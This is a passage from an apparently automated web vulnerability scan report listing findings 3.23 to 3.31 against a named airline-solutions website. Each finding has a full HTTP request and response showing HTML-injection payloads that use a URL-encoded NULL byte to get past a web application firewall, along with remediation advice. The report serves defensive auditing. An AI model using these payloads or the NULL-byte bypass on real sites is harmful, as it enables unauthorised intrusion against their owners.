Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fascend%2Fcontact%2F%22%3Bi%3A1%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A4%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Fmark_silagy%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:43:23 GMT
Pragma: no-cache
Content-Length: 7195
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/ascend/contact/?%004de66"><a>0fefd7fbea2=1">
...[SNIP]...

3.23. http://www.sabreairlinesolutions.com/home/ascend/current_issue [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/current_issue

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00a22d0<a>06115c6fe74 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a22d0<a>06115c6fe74 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/current_issue?%00a22d0<a>06115c6fe74=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/ascend
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321374; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fabout%2Fprivacy_policy%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A3%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Fmark_silagy%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:40:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321374; expires=Thu, 06-Oct-2011 09:40:34 GMT; path=/
Set-Cookie: exp_last_activity=1286376034; expires=Thu, 06-Oct-2011 09:40:34 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A1%3Bs%3A22%3A%22%2Fabout%2Fprivacy_policy%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A4%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Fmark_silagy%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:41:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 9948


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>06115c6fe74=1">current issue?%00a22d0<a>06115c6fe74=1</a>
...[SNIP]...

3.24. http://www.sabreairlinesolutions.com/home/ascend/current_issue [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/current_issue

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00831a1"><a>5e23834186a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 831a1"><a>5e23834186a in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/current_issue?%00831a1"><a>5e23834186a=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/ascend
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321374; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fabout%2Fprivacy_policy%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A3%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Fmark_silagy%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:36:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321374; expires=Thu, 06-Oct-2011 09:36:47 GMT; path=/
Set-Cookie: exp_last_activity=1286375807; expires=Thu, 06-Oct-2011 09:36:47 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A1%3Bs%3A22%3A%22%2Fabout%2Fprivacy_policy%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A4%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Fmark_silagy%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:36:56 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 9952


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/ascend/current_issue?%00831a1"><a>5e23834186a=1">
...[SNIP]...

3.25. http://www.sabreairlinesolutions.com/home/ascend/current_issue/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/current_issue/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00a38d2<a>7129be221ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a38d2<a>7129be221ae in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/current_issue/?%00a38d2<a>7129be221ae=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/ascend
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321334; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fabout%2Fmedia_press%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:40:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321334; expires=Thu, 06-Oct-2011 09:40:36 GMT; path=/
Set-Cookie: exp_last_activity=1286376035; expires=Thu, 06-Oct-2011 09:40:36 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A1%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fabout%2Fmedia_press%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:40:57 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 9996


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>7129be221ae=1">?%00a38d2<a>7129be221ae=1</a>
...[SNIP]...

3.26. http://www.sabreairlinesolutions.com/home/ascend/current_issue/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/current_issue/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f7df5"><a>b84f3cf75c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f7df5"><a>b84f3cf75c1 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/current_issue/?%00f7df5"><a>b84f3cf75c1=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/ascend
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321334; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fabout%2Fmedia_press%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:35:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321334; expires=Thu, 06-Oct-2011 09:36:04 GMT; path=/
Set-Cookie: exp_last_activity=1286375763; expires=Thu, 06-Oct-2011 09:36:04 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A1%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fabout%2Fmedia_press%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:36:21 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 10000


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/ascend/current_issue/?%00f7df5"><a>b84f3cf75c1=1">
...[SNIP]...

3.27. http://www.sabreairlinesolutions.com/home/ascend/error [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/error

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00b96d0<a>59e01a505f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b96d0<a>59e01a505f3 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/error?%00b96d0<a>59e01a505f3=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/ascend/error/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323079; __utmb=178985382.1.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:55:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286323079; expires=Thu, 06-Oct-2011 09:55:34 GMT; path=/
Set-Cookie: exp_last_activity=1286376933; expires=Thu, 06-Oct-2011 09:55:34 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fascend%2Ferror%2F%22%3Bi%3A1%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A2%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:55:52 GMT
Pragma: no-cache
Content-Length: 7054
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>59e01a505f3=1">error?%00b96d0<a>59e01a505f3=1</a>
...[SNIP]...

3.28. http://www.sabreairlinesolutions.com/home/ascend/error [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/error

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0073d52"><a>132b3839ba7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 73d52"><a>132b3839ba7 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/error?%0073d52"><a>132b3839ba7=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/ascend/error/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323079; __utmb=178985382.1.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:51:25 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286323079; expires=Thu, 06-Oct-2011 09:51:32 GMT; path=/
Set-Cookie: exp_last_activity=1286376692; expires=Thu, 06-Oct-2011 09:51:32 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fascend%2Ferror%2F%22%3Bi%3A1%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A2%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:51:49 GMT
Pragma: no-cache
Content-Length: 7058
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/ascend/error?%0073d52"><a>132b3839ba7=1">
...[SNIP]...

3.29. http://www.sabreairlinesolutions.com/home/ascend/error/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/error/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00a1fc9<a>54ce38393eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a1fc9<a>54ce38393eb in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/error/?%00a1fc9<a>54ce38393eb=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/includes/ascend_confirm.php
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323073; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fincludes%2Fform_suites%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A3%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:46:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286323073; expires=Thu, 06-Oct-2011 09:46:06 GMT; path=/
Set-Cookie: exp_last_activity=1286376366; expires=Thu, 06-Oct-2011 09:46:06 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fascend%2Ferror%2F%22%3Bi%3A1%3Bs%3A22%3A%22%2Fincludes%2Fform_suites%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A4%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:46:24 GMT
Pragma: no-cache
Content-Length: 7094
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>54ce38393eb=1">?%00a1fc9<a>54ce38393eb=1</a>
...[SNIP]...

3.30. http://www.sabreairlinesolutions.com/home/ascend/error/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/error/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007d0b4"><a>0bfb3bd1f3c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7d0b4"><a>0bfb3bd1f3c in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/error/?%007d0b4"><a>0bfb3bd1f3c=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/includes/ascend_confirm.php
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323073; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fincludes%2Fform_suites%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A3%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:42:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286323073; expires=Thu, 06-Oct-2011 09:42:08 GMT; path=/
Set-Cookie: exp_last_activity=1286376127; expires=Thu, 06-Oct-2011 09:42:08 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fascend%2Ferror%2F%22%3Bi%3A1%3Bs%3A22%3A%22%2Fincludes%2Fform_suites%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A4%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:42:30 GMT
Pragma: no-cache
Content-Length: 7098
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/ascend/error/?%007d0b4"><a>0bfb3bd1f3c=1">
...[SNIP]...

3.31. http://www.sabreairlinesolutions.com/home/ascend/past_editions [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/past_editions

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %003813b<a>beec50d4773 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3813b<a>beec50d4773 in the application's response.

